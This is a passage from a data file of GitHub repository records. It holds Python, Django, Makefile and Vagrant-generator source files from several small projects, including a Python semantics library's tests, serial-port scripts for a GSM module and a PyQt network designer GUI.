self.btnResponsePunto5.destroy()\r\n del self.btnResponsePunto5\r\n if not hasattr(self,\"lblResponsePunto5\"):\r\n self.lblResponsePunto5 = tk.Label(self.punto5FrameBase)\r\n self.lblResponsePunto5.config(\r\n text=\"No hay socios de equipos registrados necesarios para formar una respuesta.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto5.pack(side='left',padx=(4,3),fill='x')\r\n else:\r\n self.lblResponsePunto5.config(text=\"No hay socios de equipos registrados necesarios para formar una respuesta.\")\r\n self.lblResponsePunto5.update()\r\n\r\n def punto5LoadResponse(self):\r\n if hasattr(self,\"lblResponsePunto5\"):\r\n self.lblResponsePunto5.pack_forget()\r\n self.lblResponsePunto5.destroy()\r\n\r\n if not hasattr(self,\"btnResponsePunto5\"):\r\n self.btnResponsePunto5 = tk.Button(self.punto5FrameBase)\r\n self.btnResponsePunto5.config(\r\n text=\"Ver respuesta\", command=self.showResponsePunto5\r\n )\r\n self.btnResponsePunto5.pack(side='left',padx=(4,3))\r\n \r\n def showResponsePunto5(self):\r\n if hasattr(self,\"topFramePto5\"):\r\n self.topFramePto5.focus()\r\n else:\r\n xInit = int(self.root.winfo_rootx()) + int(self.root.winfo_width()*0.25)\r\n yInit = int(self.root.winfo_rooty()) + int(self.root.winfo_height()*0.25)\r\n\r\n self.topFramePto5 = tk.Toplevel(self.root)\r\n self.topFramePto5.title(\"Ranking de equipos según su cantidad de socios.\")\r\n self.topFramePto5.geometry(\"485x270+%i+%i\"%(xInit,yInit))\r\n btnFrame = ttk.Frame(self.topFramePto5)\r\n btnFrame.pack(side='bottom',fill='x')\r\n btnOK = ttk.Button(btnFrame)\r\n btnOK.config(text=\"Aceptar\",command=self.destroyTopPto5)\r\n btnOK.pack(side='right',padx=(0,10), pady=(0,3))\r\n\r\n tableFrame = ttk.Frame(self.topFramePto5)\r\n tableFrame.pack(side='top',fill='both',expand='True')\r\n \r\n dataColumns = [\"#\",\"Equipo\",\"Socios\",\"Max. Edad\",\"Min. 
Edad\"]\r\n tableResponse = ttk.Treeview(tableFrame,columns=dataColumns,show='headings')\r\n \r\n for c in dataColumns:\r\n tableResponse.heading(c,text=c,anchor='w')\r\n tableResponse.column(c,width=len(c),stretch=True,anchor='w')\r\n for i in range(len(self.dataSociosPunto5)):\r\n equipo,cantSocios,maxEdad,minEdad = self.dataSociosPunto5[i]\r\n tableResponse.insert('','end',values=(i+1,equipo,cantSocios,maxEdad,minEdad))\r\n \r\n scroll = ttk.Scrollbar(tableFrame,orient='vertical',command=tableResponse.yview)\r\n tableResponse.config(yscrollcommand=scroll.set)\r\n tableResponse.pack(side='left',fill='both',expand=True,padx=(15,0),pady=5)\r\n scroll.pack(side='left',fill='y',padx=(0,10),pady=5)\r\n \r\n def destroyTopPto5(self):\r\n self.topFramePto5.destroy()\r\n del self.topFramePto5\r\n\r\n "
}
] | 4 |
SurajPawar15-smart/Findstate
|
https://github.com/SurajPawar15-smart/Findstate
|
b1db16f289daa8fde5dd15348c319737413c7752
|
db513131ea4cf03dcbcc106837b7a44d37411431
|
f10552b28dbded2d00e06fa306a387a29c762379
|
refs/heads/master
| 2022-12-04T02:25:43.845646 | 2020-08-15T13:28:54 | 2020-08-15T13:28:54 | 287,751,925 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7194066643714905,
"alphanum_fraction": 0.7194066643714905,
"avg_line_length": 32.04166793823242,
"blob_id": "b4b41386fc52bfc5d721c83eca9c4cb2c37220a8",
"content_id": "7e6db89c666ff965dc116bb1e994b15dde896413",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 809,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 24,
"path": "/crud/views.py",
"repo_name": "SurajPawar15-smart/Findstate",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse\ndef agent(request):\n return render(request, 'agent.html')\ndef index(request):\n return render(request, 'index.html')\ndef about(request):\n return render(request, 'about.html')\ndef blog(request):\n return render(request, 'blog.html')\ndef contact(request):\n return render(request, 'contact.html')\ndef blog_single(request):\n return render(request, 'blog_single.html')\ndef main(request):\n return render(request, 'main.html')\ndef properties(request):\n return render(request, 'properties.html')\ndef properties_single(request):\n return render(request, 'properties_single.html')\ndef services(request):\n return render(request, 'services.html')\ndef home(request):\n return render(request, 'home.html')\n "
}
] | 1 |
lijunsong/lambda-py
|
https://github.com/lijunsong/lambda-py
|
a5becb8a498eb88455fa8cb38492937d3aedb031
|
d2ff89be26c673b875e400fd27dba9f010e047c5
|
7fde94739c28bd8e3aa2ce9845e0d312e3929588
|
refs/heads/master
| 2020-12-30T17:44:17.932473 | 2013-03-01T22:31:36 | 2013-03-01T22:31:36 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5803418755531311,
"alphanum_fraction": 0.5803418755531311,
"avg_line_length": 22.360000610351562,
"blob_id": "bc636512ecf8ba30eef7e395343476fe9036b420",
"content_id": "d988cb28ee8fe860e529e1e9ebef96ea8ac0cc71",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 50,
"path": "/base/pylib/dict.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "\nclass dict(object):\n def __init__(self):\n self = ___delta(\"dict-init\", self, dict)\n\n def __len__(self):\n return ___delta(\"dict-len\", self, int)\n\n def __str__(self):\n return ___delta(\"dict-str\", self, str)\n\n def __list__(self):\n return ___delta(\"dict->list\", self, list)\n\n def get(self, key, *default):\n return ___delta(\"dict-get\", self, key, default)\n\n def __iter__(self):\n return self.keys().__iter__()\n\n def __in__(self, other):\n return ___delta(\"dict-in\", self, other)\n\n def __eq__(self, other):\n return dicteq(self, other)\n\n def clear(self):\n return ___delta(\"dict-clear\", self)\n\n def update(self, *other):\n return ___delta(\"dict-update\", self, other)\n\n def keys(self):\n return ___delta(\"dict-keys\", self, set)\n\n def values(self):\n return ___delta(\"dict-values\", self, set)\n\n def items(self):\n return ___delta(\"dict-items\", self, set, tuple)\n\n def __getitem__(self, key):\n return ___delta(\"dict-getitem\", self, key)\n\n def __setitem__(self, key, val):\n return ___delta(\"dict-setitem\", self, key, val)\n\n def __delitem__(self, key):\n return ___delta(\"dict-delitem\", self, key)\n\n___assign(\"%dict\", dict)\n\n"
},
{
"alpha_fraction": 0.5380059480667114,
"alphanum_fraction": 0.5666337609291077,
"avg_line_length": 24.9743595123291,
"blob_id": "5a74b9d3e93e2d5d3b62f0796ac140b47de7a562",
"content_id": "5ff80388d500633ce3916f64c68687eedf7c98c2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1013,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 39,
"path": "/tests/python-reference/multiple-inheritance/test_multiple_inheritance.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# Testing multiple inheritance...\nclass C(object):\n def __init__(self):\n self.__state = 0\n def getstate(self):\n return self.__state\n def setstate(self, state):\n self.__state = state\na = C()\n___assertEqual(a.getstate(), 0)\na.setstate(10)\n___assertEqual(a.getstate(), 10)\nclass D(dict, C):\n def __init__(self):\n type({}).__init__(self)\n C.__init__(self)\nd = D()\n___assertEqual(list(d.keys()), [])\nd[\"hello\"] = \"world\"\n___assertEqual(list(d.items()), [(\"hello\", \"world\")])\n___assertEqual(d[\"hello\"], \"world\")\n___assertEqual(d.getstate(), 0)\nd.setstate(10)\n___assertEqual(d.getstate(), 10)\n___assertEqual(D.__mro__, (D, dict, C, object))\n\n# SF bug #442833\nclass Node(object):\n def __int__(self):\n return int(self.foo())\n def foo(self):\n return \"23\"\nclass Frag(Node, list):\n def foo(self):\n return \"42\"\n___assertEqual(Node().__int__(), 23)\n___assertEqual(int(Node()), 23)\n___assertEqual(Frag().__int__(), 42)\n___assertEqual(int(Frag()), 42)\n"
},
{
"alpha_fraction": 0.5879999995231628,
"alphanum_fraction": 0.5920000076293945,
"avg_line_length": 92.75,
"blob_id": "6cf25ae257f171b66b1b734513334d3cffd55f1b",
"content_id": "dee3b725b97ffa79be77971b136105e222fec912",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 750,
"license_type": "permissive",
"max_line_length": 333,
"num_lines": 8,
"path": "/base/Makefile",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "all:\n\tfor foo in `git grep -l 'lang plai-typed$$' | grep '\\.rkt$$'`; do sed -i s/'lang plai-typed$$'/'lang plai-typed\\/untyped'/g $$foo; done && git ls-files | grep '\\.rkt$$' | xargs raco make -j 5\n\ntypecheck:\n\tfor foo in `git ls-files | grep '\\.rkt$$'`; do `which cp` -p $$foo $$foo\"_\"; done && git ls-files | grep '\\.rkt$$' | xargs sed -i s/'lang plai-typed\\/untyped'/'lang plai-typed'/g && git ls-files | grep '\\.rkt$$' | xargs raco make -j 5; for foo in `git ls-files | grep '\\.rkt$$'`; do `which cp` -p $$foo\"_\" $$foo && rm $$foo\"_\"; done\n\ntyped:\n\tfor foo in `git grep -l 'lang plai-typed/untyped' | grep '\\.rkt$$'`; do sed -i s/'lang plai-typed\\/untyped'/'lang plai-typed'/g $$foo; done && git ls-files | grep '\\.rkt$$' | xargs raco make -j 5\n"
},
{
"alpha_fraction": 0.5263158082962036,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 11.333333015441895,
"blob_id": "c272197d20cd3901622079ae080db646f6d84607",
"content_id": "7c9b0a77faf19ce970ebff91fa86ccf7eba4c9aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 38,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 3,
"path": "/tests/bugs/address-of-none.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "ret = None\nret = 3\nassert(None == 3)\n\n"
},
{
"alpha_fraction": 0.44720497727394104,
"alphanum_fraction": 0.4906832277774811,
"avg_line_length": 16.88888931274414,
"blob_id": "adffaa643db87f90caca07f3783f80ad20c1b866",
"content_id": "6d4cd6d35fcd376994c41132955c960bc62a6827",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 9,
"path": "/base/pylib/dicteq.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "def dicteq(d1, d2):\n if len(d1) == len(d2):\n for x in d1:\n v = d1[x]\n if d2[x] != v:\n return False\n return True\n else:\n return False\n"
},
{
"alpha_fraction": 0.4849397540092468,
"alphanum_fraction": 0.5120481848716736,
"avg_line_length": 21.133333206176758,
"blob_id": "bbc1f2ca35142969c9ed80b025cd7dc4eb68a53c",
"content_id": "d121dc8f21b379f50611c56be1b9f942b4ec2534",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 332,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 15,
"path": "/tests/scope/recursion.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# recursive functions must work. They aren't that hard, \n# although we should be sure to test...\n\ndef f(x):\n def fact(n):\n if n == 0:\n return 1\n else:\n return n * fact(n - 1)\n if x >= 0:\n return fact(x)\n else:\n raise ValueError(\"x must be >= 0\")\n\n___assertEqual(f(6), 720)\n"
},
{
"alpha_fraction": 0.5616883039474487,
"alphanum_fraction": 0.5876623392105103,
"avg_line_length": 22.69230842590332,
"blob_id": "20c701162d71796d1b39138304e18189719b3244",
"content_id": "e565b214a1020efcd01e84bf687291a2a7524fbf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 13,
"path": "/tests/scope/nearest-enclosing-scope.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# should this test fail, I suspect there is something\n# wrong with shadowing/scope type precedence. \n\ndef f(x):\n def g(y):\n x = 42 # check that this masks binding in f()\n def h(z):\n return x + z\n return h\n return g(2)\n\ntest_func = f(10)\n___assertEqual(test_func(5), 47)\n"
},
{
"alpha_fraction": 0.6454545259475708,
"alphanum_fraction": 0.6709091067314148,
"avg_line_length": 26.5,
"blob_id": "159483dac70fb7e495865d8301c0e49c750b1460",
"content_id": "ad256ae78bc14a7bd3071a1d17102214bb42ee5c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 550,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 20,
"path": "/tests/scope/extra-nesting.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# the variable x will be nonlocal in extra given our \n# current implementation of scope. Since there is no\n# local to shadow it, it should be correctly closed over \n# in adder(). \n\n# TODO it might be good to have a case to check for\n# proper use of closed-over nonlocals. \n\ndef make_adder2(x):\n def extra(): # check freevars passing through non-use scopes\n def adder(y):\n return x + y\n return adder\n return extra()\n\ninc = make_adder2(1)\nplus10 = make_adder2(10)\n\n___assertEqual(inc(1), 2)\n___assertEqual(plus10(-2), 8)\n"
},
{
"alpha_fraction": 0.5029761791229248,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 17.66666603088379,
"blob_id": "ee0e468eff691e22e8d79281639a9639852b4560",
"content_id": "50e5109f6b418a306d1d69ccf8c949b1ba8e1001",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 336,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 18,
"path": "/tests/scope/nonlocal-function.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# make sure we are closing over the same location for x\n\ndef f(x):\n def inc():\n nonlocal x\n x += 1\n return x\n def dec():\n nonlocal x\n x -= 1\n return x\n return inc, dec\n\ninc, dec = f(0)\n___assertEqual(inc(), 1)\n___assertEqual(inc(), 2)\n___assertEqual(dec(), 1)\n___assertEqual(dec(), 0)\n"
},
{
"alpha_fraction": 0.53663569688797,
"alphanum_fraction": 0.5386996865272522,
"avg_line_length": 23.794872283935547,
"blob_id": "71765324995e2d51ca7b190164f390b72246110a",
"content_id": "17860670820685930c353f2fbf15937ba124d53e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 969,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 39,
"path": "/base/pylib/set.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "\nclass set(object):\n def __init__(self, *args):\n if ___delta(\"num=\", args.__len__(), 0):\n self = ___emptyset()\n else:\n self = args.__getitem__(0).__set__()\n\n def __len__(self):\n return ___delta(\"set-len\", self, int)\n\n def __set__(self):\n # NOTE(joe): list copy can do the job here, no need for set-copy prim\n return self.__list__().__set__()\n\n def __list__(self):\n return ___delta(\"set-list\", self, list)\n\n def __iter__(self):\n return SeqIter(self.__list__())\n\n def __in__(self, elt):\n return ___delta(\"set-in\", self, elt)\n\n def __eq__(self, other):\n return ___delta(\"set-eq\", self, other)\n\n def __sub__(self, other):\n return ___delta(\"set-sub\", self, other, set)\n\n def __and__(self, other):\n return ___delta(\"set-and\", self, other, set)\n\n def __or__(self, other):\n return ___delta(\"set-or\", self, other, set)\n\n def __xor__(self, other):\n return ___delta(\"set-xor\", self, other, set)\n\n___assign(\"%set\", set)\n\n"
},
{
"alpha_fraction": 0.5639810562133789,
"alphanum_fraction": 0.6161137223243713,
"avg_line_length": 16.58333396911621,
"blob_id": "cdc8733c82c25a1bb70f6d2c104a21b0a6ccbbd8",
"content_id": "0ab51810c86dcb6711b7c8f4a2cbb68168c8f3dd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 12,
"path": "/tests/scope/simple-nesting.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# closing over correct values...\n\ndef make_adder(x):\n def adder(y):\n return x + y\n return adder\n\ninc = make_adder(1)\nplus10 = make_adder(10)\n\n___assertEqual(inc(1), 2)\n___assertEqual(plus10(-2), 8)\n"
},
{
"alpha_fraction": 0.513864278793335,
"alphanum_fraction": 0.5238938331604004,
"avg_line_length": 23.185714721679688,
"blob_id": "b8070da1c6dd90724631b146487fb29d03343d06",
"content_id": "f11f2138fe7367c9a7e0e312c5a397c00e741d38",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1695,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 70,
"path": "/base/pylib/list.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "\nclass list(object):\n def __init__(self, other):\n if (type(other) == list):\n self = ___delta(\"list-copy\", other, list)\n else:\n self = other.__list__()\n\n def __len__(self):\n return ___delta(\"list-len\", self, int)\n\n def __add__(self, other):\n return ___delta(\"list+\", self, other, list)\n\n def __list__(self):\n return SeqIter(self).__list__()\n\n def __iter__(self):\n return SeqIter(self)\n\n def __tuple__(self):\n return ___delta(\"list-tuple\", self, tuple)\n\n def __set__(self):\n return ___delta(\"list-set\", self, set)\n\n def __in__(self, test):\n return ___delta(\"list-in\", self, test)\n\n def __str__(self):\n return ___delta(\"list-str\", self, str)\n\n def __getitem__(self, idx):\n return ___delta(\"list-getitem\", self, idx)\n\n def __setitem__(self, idx, val):\n return ___delta(\"list-setitem\", self, idx, val, list)\n\n # NOTE(joe): copied code (tuple.py)\n def __cmp__(self, other):\n def lstcmp(self, other, idx):\n li1 = self.__getitem__(idx)\n li2 = other.__getitem__(idx)\n if ___prim2(\"Is\", li1, None):\n if ___prim2(\"Is\", li2, None):\n return 0\n else:\n return 1\n else:\n if ___prim2(\"Is\", li2, None):\n return 1\n else:\n cmpval = li1.__cmp__(li2)\n if cmpval.__eq__(0):\n nidx = idx.__add__(1)\n return lstcmp(self, other, nidx)\n else:\n return cmpval\n return lstcmp(self, other, 0)\n\n def __eq__(self, other):\n cmpresult = self.__cmp__(other)\n return cmpresult.__eq__(0)\n\n def extend(self, other):\n self = self.__add__(other)\n\n def append(self, other):\n self.extend([other])\n\n___assign(\"%list\", list)\n\n"
},
{
"alpha_fraction": 0.6901669502258301,
"alphanum_fraction": 0.6938775777816772,
"avg_line_length": 23.5,
"blob_id": "b773eec3cc070dbd9a2a15ff47a3c36880ece4dc",
"content_id": "d9ce890bb8b33542fdb5bd6092468c78466fd74a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 22,
"path": "/tests/scope/unbound-local.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# use of variable before assignment. There shouldn't be a\n# problem with this case unless we fail to correctly lift\n# all variables and assign them to Unbound if they are \n# not defined. \n\n# TODO: formalize what is going wrong if we get NameError\n# instead of UnboundLocalError, or elsewise. \n\ndef errorInOuter():\n print(y)\n def inner():\n return y\n y = 1\n\ndef errorInInner():\n def inner():\n return y\n inner()\n y = 1\n\n___assertRaises(UnboundLocalError, errorInOuter)\n___assertRaises(NameError, errorInInner)\n"
}
] | 13 |
jinwanlin/sim900a
|
https://github.com/jinwanlin/sim900a
|
119258121d668e2c5b218a3b6ebf5243191db2d4
|
7bd059bccf0c0f49db5d47bb59eb4b0194b22d75
|
327524df1f52d3343780550282912f19f177b259
|
refs/heads/master
| 2021-01-10T20:39:26.114572 | 2015-08-25T02:23:28 | 2015-08-25T02:23:28 | 41,335,355 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 22.5,
"blob_id": "008078aa557fafea2b55eb3ace5ca3a8714cfc54",
"content_id": "ed99afd3707235bbdbc8c006af59b2f98a5e8e52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 4,
"path": "/write.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "import serial \nser = serial.Serial(\"/dev/ttyAMA0\", 9600)\nser.write(\"AT\")\n#print(ser.read(2))\n\n\n"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5277777910232544,
"avg_line_length": 15.5,
"blob_id": "f67fe39c21a0ca93f04aa0d53e35e227a58473fe",
"content_id": "03eb5dfc0855bdec6152d495705e3b91cf6bed3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 6,
"path": "/classname.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "class classname:\n def mod1(self):\n pass\n\n def echo(self,params):\n print params\n \n"
},
{
"alpha_fraction": 0.5411392450332642,
"alphanum_fraction": 0.5411392450332642,
"avg_line_length": 24.91666603088379,
"blob_id": "cc3269cd51ff46f3a70133045f7be534505f9ff1",
"content_id": "1d094462540a671678f77d3af5df60a2f83ae879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 316,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/classname_test.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "def test():\n clsname = \"classname\"\n# method = \n params=\"jinwanlin\"\n obj = __import__(clsname) # import module\n c = getattr(obj,clsname)\n obj = c() # new class\n mtd = getattr(obj,\"echo\")\n mtd(params) # call def\n \nif __name__ == '__main__':\n test(\"classname.echo('jinwanlin')\") \n "
},
{
"alpha_fraction": 0.5983935594558716,
"alphanum_fraction": 0.6224899888038635,
"avg_line_length": 16.785715103149414,
"blob_id": "a43930fb00d7a0538d452a75fd2d1d61f93e2c09",
"content_id": "728aa10389db314af88e4e73c112c2ce7d1e94e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 498,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 28,
"path": "/read.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "import time\nimport serial\nser = serial.Serial(\n port='/dev/ttyAMA0',\n baudrate=9600,\n parity=serial.PARITY_ODD,\n stopbits=serial.STOPBITS_TWO,\n bytesize=serial.SEVENBITS\n)\ndata = ''\nwhile(True):\n while ser.inWaiting() > 0:\n data += ser.read(1)\n if data != '':\n hexShow(data)\n# print('------------') \n \n\n#\n# import serial\n# t = serial.Serial(\"/dev/ttyAMA0\", 9600)\n# t.portstr\n# strInput = raw_input('AT')\n# n = t.write(strInput)\n# print n\n# str = t.read(n)\n# print str\n# hexShow(str)\n"
}
] | 4 |
SuperboGiuseppe/dncs_lab2
|
https://github.com/SuperboGiuseppe/dncs_lab2
|
c03aedd2668b11327f9cc9c2dc501e5e34aa57f7
|
c340169f3133c4fa1574f5be82268e2958e57975
|
5198bbf8df9455ae1cfbe12bb1e4d524f4be0429
|
refs/heads/main
| 2023-03-16T02:36:07.694591 | 2021-03-15T14:21:43 | 2021-03-15T14:21:43 | 309,404,448 | 3 | 3 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5215771794319153,
"alphanum_fraction": 0.5308910012245178,
"avg_line_length": 45.02857208251953,
"blob_id": "083d809493283eba9860a5aad672a52137b06584",
"content_id": "cc822c5baf9cc86dd4a278c6689cf384e87e79e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3221,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 70,
"path": "/fromHTMLtoVagrant/support_scripts/vagrantfilecreator.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import os\n\n\ndef create_vagrantfile(configuration):\n directory = configuration[5] + \"/Vagrantfile\"\n f = open(directory, \"w+\")\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n\n #Desktop environment script\n if(configuration[1]!=\"No Desktop Environment\"):\n f.write(\"$script = <<-SCRIPT\\n\")\n if(configuration[0][0] == \"u\"):\n f.write(\"sudo apt update\\n\")\n if(configuration[1] == \"Gnome\"):\n f.write(\"sudo apt -y install gnome-session\\n\")\n if(configuration[1] == \"KDE\"):\n f.write(\"sudo apt -y install kubuntu-desktop\\n\")\n if(configuration[1] == \"XFCE\"):\n f.write(\"sudo apt -y install xubuntu-desktop\\n\")\n if(configuration[1] == \"Mate\"):\n f.write(\"sudo apt -y install ubuntu-mate-desktop\\n\")\n f.write(\"sudo reboot\\n\")\n if(configuration[0][0] == \"d\"):\n f.write(\"sudo apt-get update\\n\")\n if (configuration[1] == \"Gnome\"):\n f.write(\"sudo apt-get -y install task-gnome-desktop\\n\")\n if (configuration[1] == \"KDE\"):\n f.write(\"sudo apt-get -y install task-kde-desktop\\n\")\n if (configuration[1] == \"XFCE\"):\n f.write(\"sudo apt-get -y install task-xfce-desktop\\n\")\n if (configuration[1] == \"Mate\"):\n f.write(\"sudo apt-get -y install task-mate-desktop\\n\")\n f.write(\"sudo reboot\\n\")\n if(configuration[0][0] == \"c\"):\n if (configuration[1] == \"Gnome\"):\n f.write(\"yum -y groups install \\\"GNOME Desktop\\\"\\n\")\n f.write(\"echo \\\"exec gnome-session\\\" >> ~/.xinitrc\\n\")\n if (configuration[1] == \"KDE\"):\n f.write(\"yum -y groups install \\\"KDE Plasma Workspaces\\\"\\n\")\n f.write(\"echo \\\"exec startkde\\\" >> ~/.xinitrc\\n\")\n if (configuration[1] == \"XFCE\"):\n f.write(\"yum --enablerepo=epel -y groups install \\\"Xfce\\\"\\n\")\n f.write(\"echo \\\"exec /usr/bin/xfce4-session\\\" >> ~/.xinitrc\\n\")\n if (configuration[1] == \"Mate\"):\n f.write(\"yum --enablerepo=epel -y groups install \\\"MATE Desktop\\\"\\n\")\n f.write(\"echo \\\"exec /usr/bin/mate-session\\\" >> ~/.xinitrc\\n\")\n f.write(\"startx\\n\")\n f.write(\"SCRIPT\\n\\n\")\n\n #Virtual machine configuration\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"\\tconfig.vm.box = \\\"\" + configuration[0] + \"\\\"\\n\")\n f.write(\"\\tconfig.vm.host_name = \\\"\" + configuration[5] + \"\\\"\\n\")\n f.write(\"\\tconfig.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"\\t\\tvb.gui = true\\n\")\n f.write(\"\\t\\tvb.memory = \" + configuration[3] + \"\\n\")\n f.write(\"\\t\\tvb.cpus = \" + configuration[2] + \"\\n\")\n if(configuration[4] != \"0\"):\n f.write(\"\\t\\tvb.customize [\\\"modifyvm\\\", :id, \\\"--vram\\\", \\\"\" + configuration[4] + \"\\\"]\\n\")\n f.write(\"\\tend\\n\")\n if (configuration[1] != \"No Desktop Environment\"):\n f.write(\"\\tconfig.vm.provision \\\"shell\\\", inline: $script\\n\")\n f.write(\"end\\n\")\n\n f.close()\n\ndef create_folder(vm_name):\n directory = vm_name\n if not os.path.exists(directory):\n os.makedirs(directory)"
},
{
"alpha_fraction": 0.648282527923584,
"alphanum_fraction": 0.6535208225250244,
"avg_line_length": 48.60490036010742,
"blob_id": "8bae48f05a8f10198cdc3f25f30a9913c15ea56a",
"content_id": "ee616d332119d95e87bf9331ca707122e3ea49a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 46580,
"license_type": "permissive",
"max_line_length": 288,
"num_lines": 939,
"path": "/gui.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "\"\"\" _____________________________________________________________\n\n Description: User interface code of the network designer\n Author: Giuseppe Superbo ([email protected])\n Date: Winter 2020-2021\n Course: Design of Networks and Communication Systems\n _____________________________________________________________\n\"\"\"\n\nimport sys, os\nfrom PyQt5 import QtGui, QtWidgets, QtCore, uic, QtWebEngineWidgets\nfrom pyvis.network import Network\n#import matplotlib.image as mpimg\n#import numpy\nimport network_core\n\n\"\"\"\nCustom Libraries\n\"\"\"\ncustom_lib_path = os.path.abspath(os.path.abspath(\"./fromHTMLtoVagrant\"))\nsys.path.append(custom_lib_path)\nimport vagrantConverterCollector\n\nclass network_design_window(QtWidgets.QMainWindow):\n \"\"\"\n Class from which it is possible to instantiate the main window. \n This window contains the design network canvas and all the functionalities related to it.\n\n \"\"\"\n errorSignal = QtCore.pyqtSignal(str)\n outputSignal = QtCore.pyqtSignal(str)\n def __init__(self):\n \"\"\"Default method that initializes the instance of the main_window.\n\n Parameters:\n - self: current instance of the class.\n \n Attributes:\n - current_network: network currently active for any edit;\n - current_network_name: name of the current network\n - network_wizard: network wizard window object (Inheritance model)\n - editor_window: editor window object (Inheritance model)\n\n \"\"\"\n super(network_design_window, self).__init__()\n self.initialize_window()\n\n def initialize_window(self):\n \"\"\"Method that initializes all the components of the main window.\n\n Parameters:\n - self: current instance of the class.\n \"\"\"\n self.current_network = network_core.create_network()\n self.current_network_name = \"\"\n self.current_network_path = \"\"\n self.current_network_template = \"\"\n self.current_network_deployed = 0\n self.vm_power = 0\n self.resize(1325, 768)\n self.center()\n self.setWindowTitle(\"Virtual Network automated deployment via 